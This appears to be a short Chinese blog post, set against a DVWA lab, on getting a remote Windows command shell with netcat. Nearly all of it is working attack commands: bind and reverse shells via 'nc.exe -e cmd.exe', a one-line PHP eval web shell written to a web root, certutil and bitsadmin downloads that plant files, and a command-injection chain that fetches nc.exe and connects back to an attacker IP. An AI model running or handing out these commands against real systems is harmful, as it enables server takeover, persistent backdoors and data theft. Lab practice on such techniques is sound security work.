nc监控实现调用受害者cmd
阅读原文时间:2023年07月12日阅读:3

正向连接

受害者 IP 是直接暴漏在公网的 或者你们同属于一个内网

受害者:nc.exe -vlp 1234 -e cmd.exe

攻击者 nc 192.168.1.1 1234

nc -lvvp 80 直接监听内网所有主机80端口

反向连接

受害者 A 出于内网状态 192.168.1.25

攻击者 B 出于内网-外网的服务器 202.12.178.22

受害者 nc.exe -e cmd.exe 攻击者ip 1234

攻击者 nc -vv -l -p 1234
C:\phpStudy\PHPTutorial\WWW\nc.exe
C:\Windows\system32\cmd.exe

echo ^@eval($_POST['cmd']); ?^>^ >C:\phpStudy\WWW\123.php

远程下载文件
certutil.exe -urlcache -split -f https://www.hack.com/robots.txt C:\phpStudy\WWW\111.php

bitsadmin /rawreturn /transfer down "http://192.168.1.115/robots.txt" "C:\phpStudy\WWW\111.php"

通过DVWA命令执行操作完成监听执行cmd

192.168.1.152|certutil.exe -urlcache -split -f http://192.168.1.189/phpStudy/PHPTutorial/WWW/netcat-1.11/nc.exe C:\phpStudy\nc.exe
192.168.1.152|C:\phpStudy\nc64.exe -e cmd.exe 192.168.1.189 82

192.168.1.189监听 nc.exe -lvvp 82

手机扫一扫

移动阅读更方便

阿里云服务器
腾讯云服务器
七牛云服务器

你可能感兴趣的文章